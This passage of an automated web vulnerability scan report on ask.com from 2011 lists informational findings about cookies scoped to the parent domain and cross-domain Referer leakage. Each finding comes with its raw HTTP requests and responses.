GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3

Response 2

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 24 Mar 2011 16:12:25 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEyOjI0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:24 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:24 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 118222


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
text/javascript">
var st = new Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c407a&p=ja-question&ord=5096479&wz_cu=0";



</script>
<noscript><img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c407a&p=ja-question&ord=5096479&wz_cu=0" height=1 width=1 id="SessionTracker" /></noscript>
</span>











<div id="ask_question_dialog"></div>
<div id="ask_question_dialog_container" style="display:none"></div>
<div id="asDlgWrap" style="overflow:hidden"></div>




































<div id="serp_ftr" class="ask-mrl15" style="margin-bottom:4px;margin-top:4px" >

















































































<a href="/about" onmousedown="return ct(this,30771)" class="txt2 info l_nu" target="_top">
About</a>


<span class="txt2 info" style="padding:0 5px 0 5px;">&#45;</span>

















































<a href="/about/legal/privacy" onmousedown="return ct(this,30771)" class="txt2 info l_nu" target="_top">
Privacy</a>


<span class="txt2 info" style="padding:0 5px 0 5px;">&#45;</span>

























<a href="http://www.ask.com/settings#askeraser" class="txt2 info l_nu" onClick="">AskEraser</a>






<span class="txt2 info" style="padding:0 5px 0 5px;">&#45;<
...[SNIP]...
6. Cookie scoped to parent domain  previous  next
There are 5 instances of this issue:

6.1. http://www.ask.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; puser=pt=VHVlLTIyLU1hci0yMDExLTE2OjAzOjU4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Content-Length: 94462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
6.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /answers/7153311/is-nail-polish-bad-for-your-nails

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:09:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 118233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
6.3. http://www.ask.com/ja-ask-dialog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /ja-ask-dialog

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ja-ask-dialog?type=signin HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/
Content-Length: 68842



...[SNIP]...
6.4. http://www.ask.com/pictures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictureslanding?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:50 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 106391


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
6.5. http://www.ask.com/pictureslanding  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictureslanding

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pictureslanding?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:07:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 59137


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>


<tit
...[SNIP]...
7. Cross-domain Referer leakage  previous  next
There are 8 instances of this issue:

7.1. http://www.ask.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; puser=pt=VHVlLTIyLU1hci0yMDExLTE2OjAzOjU4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:05:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
Content-Length: 94462

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
</span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"></a><a class="twitter sprite" href="http://twitter.com/askdotcom"></a>
...[SNIP]...
</span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" >Careers</a>
...[SNIP]...
</span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank">Help</a>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=2adc1d6f3adc1d6f3;u4=;u3=;u2=0;ord=-424747543?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
7.2. http://www.ask.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:06:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:06:59 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:06:59 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 94492

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
</span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"></a><a class="twitter sprite" href="http://twitter.com/askdotcom"></a>
...[SNIP]...
</span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" >Careers</a>
...[SNIP]...
</span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank">Help</a>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=;u3=;u2=0;ord=-1310065746?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
7.3. http://www.ask.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 24 Mar 2011 16:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:09 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:09 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 94491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
</span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"></a><a class="twitter sprite" href="http://twitter.com/askdotcom"></a>
...[SNIP]...
</span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" >Careers</a>
...[SNIP]...
</span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank">Help</a>
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /></noscript>
...[SNIP]...
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=;u3=;u2=0;ord=-138491069?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
7.4. http://www.ask.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?o=0&l=dir HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
